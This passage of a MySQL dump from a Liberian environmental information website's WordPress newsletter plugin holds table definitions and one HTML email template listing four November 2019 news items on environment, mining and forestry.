  `stats_time` int(10) unsigned NOT NULL DEFAULT '0',
  `updated` int(10) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_newsletter_emails`
--

LOCK TABLES `wp_newsletter_emails` WRITE;
/*!40000 ALTER TABLE `wp_newsletter_emails` DISABLE KEYS */;
INSERT INTO `wp_newsletter_emails` VALUES (1,'','','<!DOCTYPE html>\r\n<html>\r\n<head>\r\n<title>{subject}</title>\r\n<meta charset=\"utf-8\">\r\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\r\n<style type=\"text/css\">/* CLIENT-SPECIFIC STYLES */\r\n#outlook a{padding:0;} /* Force Outlook to provide a \"view in browser\" message */\r\n.ReadMsgBody{width:100%;} .ExternalClass{width:100%;} /* Force Hotmail to display emails at full width */\r\n.ExternalClass, .ExternalClass p, .ExternalClass span, .ExternalClass font, .ExternalClass td, .ExternalClass div {line-height: 100%;} /* Force Hotmail to display normal line spacing */\r\nbody, table, td, a{-webkit-text-size-adjust:100%; -ms-text-size-adjust:100%;} /* Prevent WebKit and Windows mobile changing default text sizes */\r\ntable, td{mso-table-lspace:0pt; mso-table-rspace:0pt;} /* Remove spacing between tables in Outlook 2007 and up */\r\nimg{-ms-interpolation-mode:bicubic;} /* Allow smoother rendering of resized image in Internet Explorer */\r\n\r\n/* RESET STYLES */\r\nbody{margin:0; padding:0; height:100% !important; margin:0; padding:0; width:100% !important;}\r\nimg{border:0; height:auto; line-height:100%; outline:none; text-decoration:none; max-width: 100%!important}\r\ntable{border-collapse:collapse !important;}\r\n\r\n\r\n/* MOBILE STYLES */\r\n@media screen and (max-width: 525px) {\r\n\r\n    /* ALLOWS FOR FLUID TABLES */\r\n    table[class=\"wrapper\"]{\r\n        width:100% !important;\r\n    }\r\n\r\n    /* ADJUSTS LAYOUT OF LOGO IMAGE */\r\n    td[class=\"logo\"]{\r\n        text-align: left;\r\n        padding: 20px 0 20px 0 !important;\r\n    }\r\n\r\n    td[class=\"logo\"] img{\r\n        margin:0 auto!important;\r\n    }\r\n\r\n    /* USE THESE CLASSES TO HIDE CONTENT ON MOBILE */\r\n    td[class=\"mobile-hide\"]{\r\n        display:none;}\r\n\r\n    img[class=\"mobile-hide\"]{\r\n        display: none !important;\r\n    }\r\n\r\n    img[class=\"img-max\"]{\r\n        max-width: 100% !important;\r\n        /*width: 100% !important;*/\r\n        height:auto !important;\r\n    }\r\n\r\n    /* FULL-WIDTH TABLES */\r\n    table[class=\"responsive-table\"]{\r\n        width:100%!important;\r\n    }\r\n\r\n    /* UTILITY CLASSES FOR ADJUSTING PADDING ON MOBILE */\r\n    td[class=\"padding\"]{\r\n        padding: 10px 5% 15px 5% !important;\r\n    }\r\n\r\n    td[class=\"padding-copy\"]{\r\n        padding: 10px 5% 10px 5% !important;\r\n        text-align: center;\r\n    }\r\n\r\n    td[class=\"padding-meta\"]{\r\n        padding: 30px 5% 0px 5% !important;\r\n        text-align: center;\r\n    }\r\n\r\n    td[class=\"no-pad\"]{\r\n        padding: 0 0 20px 0 !important;\r\n    }\r\n\r\n    td[class=\"no-padding\"]{\r\n        padding: 0 !important;\r\n    }\r\n\r\n    td[class=\"section-padding\"]{\r\n        padding: 50px 15px 50px 15px !important;\r\n    }\r\n\r\n    td[class=\"section-padding-bottom-image\"]{\r\n        padding: 50px 15px 0 15px !important;\r\n    }\r\n\r\n    /* ADJUST BUTTONS ON MOBILE */\r\n    td[class=\"mobile-wrapper\"]{\r\n        padding: 10px 5% 15px 5% !important;\r\n    }\r\n\r\n    table[class=\"mobile-button-container\"]{\r\n        margin:0 auto;\r\n        width:100% !important;\r\n    }\r\n\r\n    a[class=\"mobile-button\"]{\r\n        width:80% !important;\r\n        padding: 15px !important;\r\n        border: 0 !important;\r\n        font-size: 16px !important;\r\n    }\r\n\r\n}\r\n\r\n/* Last posts */\r\n@media all and (max-width: 525px) {\r\n    .hero-table {\r\n        width: 100%!important;\r\n        max-width: 100%!important;\r\n    }\r\n\r\n    .hero-table-right {\r\n        margin-top: 20px;\r\n    }\r\n}\r\n\r\n/* Header */\r\n.header-logo {\r\n    text-align: center!important;\r\n}\r\n@media all and (max-width: 640) {\r\n    .header-table td {\r\n        width: 100%!important;\r\n    }\r\n    .header-logo {\r\n        text-align: center!important;\r\n    }\r\n}\r\n\r\n\r\n/* Text */\r\n\r\n\r\n/* Html */\r\n.html-td p {\r\n    font-family: Helvetica, Arial, sans-serif;\r\n    font-size: 16px;\r\n}</style></head>\r\n<body style=\"margin: 0; padding: 0;\">\r\n<table type=\"block\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" align=\"center\" width=\"100%\" style=\"border-collapse: collapse; width: 100%;\" class=\"tnpc-row tnpc-row-block ui-sortable-handle\" data-id=\"header\">\r\n<tbody><tr><td align=\"center\" style=\"padding: 0;\" class=\"edit-block\">\r\n<!--[if mso]><table border=\"0\" cellpadding=\"0\" align=\"center\" cellspacing=\"0\" width=\"600\"><tr><td width=\"600\"><![endif]-->\r\n<table type=\"options\" data-json=\"eyJibG9ja19wYWRkaW5nX3RvcCI6MTUsImJsb2NrX3BhZGRpbmdfYm90dG9tIjoxNSwiYmxvY2tfcGFkZGluZ19yaWdodCI6MTUsImJsb2NrX3BhZGRpbmdfbGVmdCI6MTUsImJsb2NrX2JhY2tncm91bmQiOiIjZmZmZmZmIiwiZm9udF9mYW1pbHkiOiJIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIiwiZm9udF9zaXplIjoxNCwiZm9udF9jb2xvciI6IiM0NDQ0NDQiLCJmb250X3dlaWdodCI6Im5vcm1hbCIsImJsb2NrX2lkIjoiaGVhZGVyIn0=\" class=\"tnpc-block-content\" border=\"0\" cellpadding=\"0\" align=\"center\" cellspacing=\"0\" width=\"100%\" style=\"width: 100%!important; max-width: 600px!important\">\r\n<tbody><tr><td align=\"center\" style=\"text-align: center; width: 100%!important; padding-top: 15px; padding-left: 15px; padding-right: 15px; padding-bottom: 15px; background-color: #ffffff;\" bgcolor=\"#ffffff\" width=\"100%\">\r\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\r\n        <tbody><tr>\r\n			            <td align=\"left\" width=\"50%\" style=\"font-family: Helvetica, Arial, sans-serif; font-size: 15.4px; line-height: normal; font-weight: normal; color: #444444;\">\r\n                <a href=\"#\" target=\"_blank\">\r\n                    <img alt=\"Environmental Knowledge Management System\" src=\"https://ekmsliberia.info/wp-content/uploads/newsletter/thumbnails/2019/11/seal-200x80.png\" style=\"display: block; max-width: 100%\" border=\"0\" scale=\"0\">\r\n                </a>\r\n				            </td>\r\n            <td width=\"50%\" align=\"right\" class=\"mobile-hide\" style=\"padding: 10px; text-align: right; font-size: 14px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #444444;\">\r\n				Republic of Liberia            </td>\r\n        </tr>\r\n    </tbody></table>\r\n</td></tr></tbody></table><!--[if mso]></td></tr></table><![endif]--></td></tr></tbody></table>\r\n<table type=\"block\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" align=\"center\" width=\"100%\" style=\"border-collapse: collapse; width: 100%;\" class=\"tnpc-row tnpc-row-block ui-sortable-handle\" data-id=\"heading\">\r\n<tbody><tr><td align=\"center\" style=\"padding: 0;\" class=\"edit-block\">\r\n<!--[if mso]><table border=\"0\" cellpadding=\"0\" align=\"center\" cellspacing=\"0\" width=\"600\"><tr><td width=\"600\"><![endif]-->\r\n<table type=\"options\" data-json=\"eyJibG9ja19wYWRkaW5nX3RvcCI6MTUsImJsb2NrX3BhZGRpbmdfYm90dG9tIjoxNSwiYmxvY2tfcGFkZGluZ19yaWdodCI6MTUsImJsb2NrX3BhZGRpbmdfbGVmdCI6MTUsImJsb2NrX2JhY2tncm91bmQiOiIjZmZmZmZmIiwidGV4dCI6IkxhdGVzdCBwb3N0IGZyb20ge2Jsb2dfdGl0bGV9IiwiYWxpZ24iOiJjZW50ZXIiLCJmb250X2ZhbWlseSI6IkhlbHZldGljYSwgQXJpYWwsIHNhbnMtc2VyaWYiLCJmb250X3NpemUiOjMwLCJmb250X2NvbG9yIjoiIzQ0NDQ0NCIsImZvbnRfd2VpZ2h0IjoiYm9sZCIsImJsb2NrX2lkIjoiaGVhZGluZyJ9\" class=\"tnpc-block-content\" border=\"0\" cellpadding=\"0\" align=\"center\" cellspacing=\"0\" width=\"100%\" style=\"width: 100%!important; max-width: 600px!important\">\r\n<tbody><tr><td align=\"center\" style=\"text-align: center; width: 100%!important; padding-top: 15px; padding-left: 15px; padding-right: 15px; padding-bottom: 15px; background-color: #ffffff;\" bgcolor=\"#ffffff\" width=\"100%\">\r\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\r\n    <tbody><tr>\r\n        <td align=\"center\" class=\"heading-text\" style=\"padding: 10px; text-align: center; font-size: 30px; font-family: Helvetica, Arial, sans-serif; font-weight: bold; color: #444444;\">\r\n\r\n            Latest post from {blog_title}\r\n        </td>\r\n    </tr>\r\n</tbody></table>\r\n</td></tr></tbody></table><!--[if mso]></td></tr></table><![endif]--></td></tr></tbody></table>\r\n<table type=\"block\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" align=\"center\" width=\"100%\" style=\"border-collapse: collapse; width: 100%;\" class=\"tnpc-row tnpc-row-block ui-sortable-handle\" data-id=\"posts\">\r\n<tbody><tr><td align=\"center\" style=\"padding: 0;\" class=\"edit-block\">\r\n<!--[if mso]><table border=\"0\" cellpadding=\"0\" align=\"center\" cellspacing=\"0\" width=\"600\"><tr><td width=\"600\"><![endif]-->\r\n<table type=\"options\" data-json=\"eyJibG9ja19wYWRkaW5nX3RvcCI6MTUsImJsb2NrX3BhZGRpbmdfYm90dG9tIjozMCwiYmxvY2tfcGFkZGluZ19yaWdodCI6MzAsImJsb2NrX3BhZGRpbmdfbGVmdCI6MTUsImJsb2NrX2JhY2tncm91bmQiOiIjZmZmZmZmIiwidGl0bGUiOiJMYXN0IG5ld3MiLCJjb2xvciI6IiM5OTk5OTkiLCJmb250X2ZhbWlseSI6IkhlbHZldGljYSwgQXJpYWwsIHNhbnMtc2VyaWYiLCJmb250X3NpemUiOiIxNiIsImZvbnRfY29sb3IiOiIjMzMzMzMzIiwidGl0bGVfZm9udF9mYW1pbHkiOiJIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIiwidGl0bGVfZm9udF9zaXplIjoiMjUiLCJ0aXRsZV9mb250X2NvbG9yIjoiICMzMzMzMzMiLCJtYXgiOjQsImJ1dHRvbl9sYWJlbCI6IlJlYWQgbW9yZS4uLiIsImNhdGVnb3JpZXMiOiIiLCJ0YWdzIjoiIiwibGF5b3V0Ijoib25lIiwibGFuZ3VhZ2UiOiIiLCJidXR0b25fYmFja2dyb3VuZCI6IiM2MkEyQzkiLCJidXR0b25fZm9udF9jb2xvciI6IiNmZmZmZmYiLCJidXR0b25fZm9udF9mYW1pbHkiOiJIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIiwiYnV0dG9uX2ZvbnRfc2l6ZSI6MTYsInNob3dfaW1hZ2UiOjEsInNob3dfZGF0ZSI6MiwiYmxvY2tfaWQiOiJwb3N0cyJ9\" class=\"tnpc-block-content\" border=\"0\" cellpadding=\"0\" align=\"center\" cellspacing=\"0\" width=\"100%\" style=\"width: 100%!important; max-width: 600px!important\">\r\n<tbody><tr><td align=\"center\" style=\"text-align: center; width: 100%!important; padding-top: 15px; padding-left: 15px; padding-right: 30px; padding-bottom: 30px; background-color: #ffffff;\" bgcolor=\"#ffffff\" width=\"100%\">\r\n<!-- COMPACT ARTICLE SECTION -->\r\n\r\n\r\n\r\n    <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" class=\"responsive-table\">\r\n\r\n                \r\n            <tbody><tr>\r\n                                    <td valign=\"top\" style=\"padding: 30px 0 0 0; width: 105px!important\" class=\"mobile-hide\">\r\n                        <a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\" target=\"_blank\">\r\n                            <img src=\"https://ekmsliberia.info/wp-content/uploads/newsletter/thumbnails/2019/11/featured_training_photo-105x105-c.jpg\" width=\"105\" height=\"105\" alt=\"Image\" border=\"0\" style=\"display: block; font-family: Arial; color: #666666; font-size: 14px; min-width: 105px!important; width: 105px!important;\" scale=\"0\">\r\n                        </a>\r\n                    </td>\r\n                                <td style=\"padding: 30px 0 0 0;\" class=\"no-padding\">\r\n                    <!-- ARTICLE -->\r\n                    <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n                                                    <tbody><tr>\r\n                                <td align=\"left\" style=\"padding: 0 0 5px 25px; font-size: 13px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #aaaaaa;\" class=\"padding-meta\">\r\n                                    November 26, 2019                                </td>\r\n                            </tr>\r\n                                                <tr>\r\n                            <td align=\"left\" style=\"padding: 0 0 5px 25px; font-size: 25px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #333333; line-height: normal;\" class=\"padding-copy tnpc-row-edit\" data-type=\"title\">\r\n                                EPA, UNDP Built System To Hold Environmental Data                            </td>  \r\n                        </tr>\r\n                        <tr>\r\n                            <td align=\"left\" style=\"padding: 10px 0 15px 25px; font-family: Helvetica, Arial, sans-serif; color: #333333; font-size: 16px; line-height: 1.5em;\" class=\"padding-copy tnpc-row-edit\" data-type=\"text\">\r\n                                The Environmental Protection Agency of Liberia (EPA) and the United Nations Development Program (UNDP) have built a platform to hold all environmental data and information aimed at enhancing Liberia’s development…                            </td>\r\n                        </tr>\r\n                        <tr>\r\n                            <td align=\"left\" class=\"padding\">\r\n                                <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"background-color: #62A2C9; /*border:1px solid #353535;*/ border-radius:5px; align: right;\" align=\"right\">\r\n                                    <tbody><tr>\r\n                                        <td align=\"center\" valign=\"middle\" style=\"color: #ffffff; font-family:Helvetica, Arial, sans-serif; font-size:16px; font-weight:normal; letter-spacing:normal; line-height:normal; padding-top:15px; padding-right:30px; padding-bottom:15px; padding-left:30px; text-align: right;\">\r\n                                            <a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\" target=\"_blank\" style=\"color:#ffffff; font-size:16px; font-weight:normal; text-decoration:none;\">Read more...</a>\r\n                                        </td>\r\n                                    </tr>\r\n                                </tbody></table>    \r\n                            </td>\r\n                        </tr>\r\n                    </tbody></table>\r\n                </td>\r\n            </tr>\r\n\r\n                \r\n            <tr>\r\n                                    <td valign=\"top\" style=\"padding: 30px 0 0 0; width: 105px!important\" class=\"mobile-hide\">\r\n                        <a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\" target=\"_blank\">\r\n                            <img src=\"https://ekmsliberia.info/wp-content/uploads/newsletter/thumbnails/2019/11/Illicit-mining-105x105-c.jpg\" width=\"105\" height=\"105\" alt=\"Image\" border=\"0\" style=\"display: block; font-family: Arial; color: #666666; font-size: 14px; min-width: 105px!important; width: 105px!important;\" scale=\"0\">\r\n                        </a>\r\n                    </td>\r\n                                <td style=\"padding: 30px 0 0 0;\" class=\"no-padding\">\r\n                    <!-- ARTICLE -->\r\n                    <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n                                                    <tbody><tr>\r\n                                <td align=\"left\" style=\"padding: 0 0 5px 25px; font-size: 13px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #aaaaaa;\" class=\"padding-meta\">\r\n                                    November 26, 2019                                </td>\r\n                            </tr>\r\n                                                <tr>\r\n                            <td align=\"left\" style=\"padding: 0 0 5px 25px; font-size: 25px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #333333; line-height: normal;\" class=\"padding-copy tnpc-row-edit\" data-type=\"title\">\r\n                                GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap                            </td>  \r\n                        </tr>\r\n                        <tr>\r\n                            <td align=\"left\" style=\"padding: 10px 0 15px 25px; font-family: Helvetica, Arial, sans-serif; color: #333333; font-size: 16px; line-height: 1.5em;\" class=\"padding-copy tnpc-row-edit\" data-type=\"text\">\r\n                                Recognizing the immense potential for the artisanal mining sector to generate national revenue and provide a sustained source of livelihood for over 100,000 gold and diamond miners in Liberia who…                            </td>\r\n                        </tr>\r\n                        <tr>\r\n                            <td align=\"left\" class=\"padding\">\r\n                                <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"background-color: #62A2C9; /*border:1px solid #353535;*/ border-radius:5px; align: right;\" align=\"right\">\r\n                                    <tbody><tr>\r\n                                        <td align=\"center\" valign=\"middle\" style=\"color: #ffffff; font-family:Helvetica, Arial, sans-serif; font-size:16px; font-weight:normal; letter-spacing:normal; line-height:normal; padding-top:15px; padding-right:30px; padding-bottom:15px; padding-left:30px; text-align: right;\">\r\n                                            <a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\" target=\"_blank\" style=\"color:#ffffff; font-size:16px; font-weight:normal; text-decoration:none;\">Read more...</a>\r\n                                        </td>\r\n                                    </tr>\r\n                                </tbody></table>    \r\n                            </td>\r\n                        </tr>\r\n                    </tbody></table>\r\n                </td>\r\n            </tr>\r\n\r\n                \r\n            <tr>\r\n                                    <td valign=\"top\" style=\"padding: 30px 0 0 0; width: 105px!important\" class=\"mobile-hide\">\r\n                        <a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\" target=\"_blank\">\r\n                            <img src=\"https://ekmsliberia.info/wp-content/uploads/newsletter/thumbnails/2019/11/FDA-MD-105x105-c.jpg\" width=\"105\" height=\"105\" alt=\"Image\" border=\"0\" style=\"display: block; font-family: Arial; color: #666666; font-size: 14px; min-width: 105px!important; width: 105px!important;\" scale=\"0\">\r\n                        </a>\r\n                    </td>\r\n                                <td style=\"padding: 30px 0 0 0;\" class=\"no-padding\">\r\n                    <!-- ARTICLE -->\r\n                    <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n                                                    <tbody><tr>\r\n                                <td align=\"left\" style=\"padding: 0 0 5px 25px; font-size: 13px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #aaaaaa;\" class=\"padding-meta\">\r\n                                    November 26, 2019                                </td>\r\n                            </tr>\r\n                                                <tr>\r\n                            <td align=\"left\" style=\"padding: 0 0 5px 25px; font-size: 25px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #333333; line-height: normal;\" class=\"padding-copy tnpc-row-edit\" data-type=\"title\">\r\n                                FDA to Build New Dock at Lake Piso                            </td>  \r\n                        </tr>\r\n                        <tr>\r\n                            <td align=\"left\" style=\"padding: 10px 0 15px 25px; font-family: Helvetica, Arial, sans-serif; color: #333333; font-size: 16px; line-height: 1.5em;\" class=\"padding-copy tnpc-row-edit\" data-type=\"text\">\r\n                                A joint team of FDA and GSA technicians working with Grand Cape Mount Local Authorities today selected a site to build a new dock where FDA’ s two patrol boats…                            </td>\r\n                        </tr>\r\n                        <tr>\r\n                            <td align=\"left\" class=\"padding\">\r\n                                <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"background-color: #62A2C9; /*border:1px solid #353535;*/ border-radius:5px; align: right;\" align=\"right\">\r\n                                    <tbody><tr>\r\n                                        <td align=\"center\" valign=\"middle\" style=\"color: #ffffff; font-family:Helvetica, Arial, sans-serif; font-size:16px; font-weight:normal; letter-spacing:normal; line-height:normal; padding-top:15px; padding-right:30px; padding-bottom:15px; padding-left:30px; text-align: right;\">\r\n                                            <a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\" target=\"_blank\" style=\"color:#ffffff; font-size:16px; font-weight:normal; text-decoration:none;\">Read more...</a>\r\n                                        </td>\r\n                                    </tr>\r\n                                </tbody></table>    \r\n                            </td>\r\n                        </tr>\r\n                    </tbody></table>\r\n                </td>\r\n            </tr>\r\n\r\n                \r\n            <tr>\r\n                                    <td valign=\"top\" style=\"padding: 30px 0 0 0; width: 105px!important\" class=\"mobile-hide\">\r\n                        <a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\" target=\"_blank\">\r\n                            <img src=\"https://ekmsliberia.info/wp-content/uploads/newsletter/thumbnails/2019/11/featured_fda_program-105x105-c.jpg\" width=\"105\" height=\"105\" alt=\"Image\" border=\"0\" style=\"display: block; font-family: Arial; color: #666666; font-size: 14px; min-width: 105px!important; width: 105px!important;\" scale=\"0\">\r\n                        </a>\r\n                    </td>\r\n                                <td style=\"padding: 30px 0 0 0;\" class=\"no-padding\">\r\n                    <!-- ARTICLE -->\r\n                    <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\">\r\n                                                    <tbody><tr>\r\n                                <td align=\"left\" style=\"padding: 0 0 5px 25px; font-size: 13px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #aaaaaa;\" class=\"padding-meta\">\r\n                                    November 26, 2019                                </td>\r\n                            </tr>\r\n                                                <tr>\r\n                            <td align=\"left\" style=\"padding: 0 0 5px 25px; font-size: 25px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #333333; line-height: normal;\" class=\"padding-copy tnpc-row-edit\" data-type=\"title\">\r\n                                FDA Boss Wants Forest Rangers Armed                            </td>  \r\n                        </tr>\r\n                        <tr>\r\n                            <td align=\"left\" style=\"padding: 10px 0 15px 25px; font-family: Helvetica, Arial, sans-serif; color: #333333; font-size: 16px; line-height: 1.5em;\" class=\"padding-copy tnpc-row-edit\" data-type=\"text\">\r\n                                The Managing Director of the Forestry Development Authority (FDA) C. Mike Doryen has stressed the critical need to arm Liberia’s Forest Rangers like it is done in other countries to…                            </td>\r\n                        </tr>\r\n                        <tr>\r\n                            <td align=\"left\" class=\"padding\">\r\n                                <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"background-color: #62A2C9; /*border:1px solid #353535;*/ border-radius:5px; align: right;\" align=\"right\">\r\n                                    <tbody><tr>\r\n                                        <td align=\"center\" valign=\"middle\" style=\"color: #ffffff; font-family:Helvetica, Arial, sans-serif; font-size:16px; font-weight:normal; letter-spacing:normal; line-height:normal; padding-top:15px; padding-right:30px; padding-bottom:15px; padding-left:30px; text-align: right;\">\r\n                                            <a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\" target=\"_blank\" style=\"color:#ffffff; font-size:16px; font-weight:normal; text-decoration:none;\">Read more...</a>\r\n                                        </td>\r\n                                    </tr>\r\n                                </tbody></table>    \r\n                            </td>\r\n                        </tr>\r\n                    </tbody></table>\r\n                </td>\r\n            </tr>\r\n\r\n        \r\n    </tbody></table>\r\n</td></tr></tbody></table><!--[if mso]></td></tr></table><![endif]--></td></tr></tbody></table>\r\n<table type=\"block\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" align=\"center\" width=\"100%\" style=\"border-collapse: collapse; width: 100%;\" class=\"tnpc-row tnpc-row-block ui-sortable-handle\" data-id=\"footer\">\r\n<tbody><tr><td align=\"center\" style=\"padding: 0;\" class=\"edit-block\">\r\n<!--[if mso]><table border=\"0\" cellpadding=\"0\" align=\"center\" cellspacing=\"0\" width=\"600\"><tr><td width=\"600\"><![endif]-->\r\n<table type=\"options\" data-json=\"eyJibG9ja19wYWRkaW5nX3RvcCI6MTUsImJsb2NrX3BhZGRpbmdfYm90dG9tIjoxNSwiYmxvY2tfcGFkZGluZ19yaWdodCI6MTUsImJsb2NrX3BhZGRpbmdfbGVmdCI6MTUsImJsb2NrX2JhY2tncm91bmQiOiIjZmZmZmZmIiwidmlldyI6IlZpZXcgb25saW5lIiwicHJvZmlsZSI6Ik1vZGlmeSB5b3VyIHN1YnNjcmlwdGlvbiIsImZvbnRfZmFtaWx5IjoiSGVsdmV0aWNhLCBBcmlhbCwgc2Fucy1zZXJpZiIsImZvbnRfc2l6ZSI6MTMsImZvbnRfY29sb3IiOiIjNDQ0NDQ0IiwiZm9udF93ZWlnaHQiOiJub3JtYWwiLCJibG9ja19pZCI6ImZvb3RlciJ9\" class=\"tnpc-block-content\" border=\"0\" cellpadding=\"0\" align=\"center\" cellspacing=\"0\" width=\"100%\" style=\"width: 100%!important; max-width: 600px!important\">\r\n<tbody><tr><td align=\"center\" style=\"text-align: center; width: 100%!important; padding-top: 15px; padding-left: 15px; padding-right: 15px; padding-bottom: 15px; background-color: #ffffff;\" bgcolor=\"#ffffff\" width=\"100%\">\r\n<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\r\n    <tbody><tr>\r\n        <td align=\"center\">\r\n\r\n            <a class=\"footer-text\" style=\"font-size: 13px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #444444; text-decoration: none;\" href=\"{profile_url}\">Modify your subscription</a>\r\n\r\n            <span class=\"footer-text\" style=\"font-size: 13px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #444444; text-decoration: none;\">&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;</span>\r\n\r\n            <a class=\"footer-text\" style=\"font-size: 13px; font-family: Helvetica, Arial, sans-serif; font-weight: normal; color: #444444; text-decoration: none;\" href=\"{email_url}\">View online</a>\r\n\r\n        </td>\r\n    </tr>\r\n</tbody></table>\r\n</td></tr></tbody></table><!--[if mso]></td></tr></table><![endif]--></td></tr></tbody></table>\r\n</body>\r\n</html>','',NULL,'','2019-12-05 00:55:02','new',0,0,0,1,0,'message','select * from wp_newsletter where status=\'C\'',2,'','','This email requires a modern e-mail reader but you can view the email online here:\n{email_url}.\n\nThank you, Official Website of the Environmental Knowledge Management System\n\nTo change your subscription follow: {profile_url}.',NULL,1575507302,'5ba8666d5d',NULL,0,0,'',0,0,0,0,0);
/*!40000 ALTER TABLE `wp_newsletter_emails` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_newsletter_sent`
--

DROP TABLE IF EXISTS `wp_newsletter_sent`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_newsletter_sent` (
  `email_id` int(10) unsigned NOT NULL DEFAULT '0',
  `user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `status` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `open` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `time` int(10) unsigned NOT NULL DEFAULT '0',
  `error` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `ip` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `country` varchar(4) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`email_id`,`user_id`),
  KEY `user_id` (`user_id`),
  KEY `email_id` (`email_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_newsletter_sent`
--

LOCK TABLES `wp_newsletter_sent` WRITE;
/*!40000 ALTER TABLE `wp_newsletter_sent` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_newsletter_sent` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_newsletter_stats`
--

DROP TABLE IF EXISTS `wp_newsletter_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_newsletter_stats` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_id` int(11) NOT NULL DEFAULT '0',
  `email_id` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0',
  `link_id` int(11) NOT NULL DEFAULT '0',
  `ip` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `country` varchar(4) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `email_id` (`email_id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_newsletter_stats`
--

LOCK TABLES `wp_newsletter_stats` WRITE;
/*!40000 ALTER TABLE `wp_newsletter_stats` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_newsletter_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_newsletter_user_logs`
--

DROP TABLE IF EXISTS `wp_newsletter_user_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_newsletter_user_logs` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `ip` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `source` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `data` longtext COLLATE utf8mb4_unicode_ci,
  `created` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=110 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
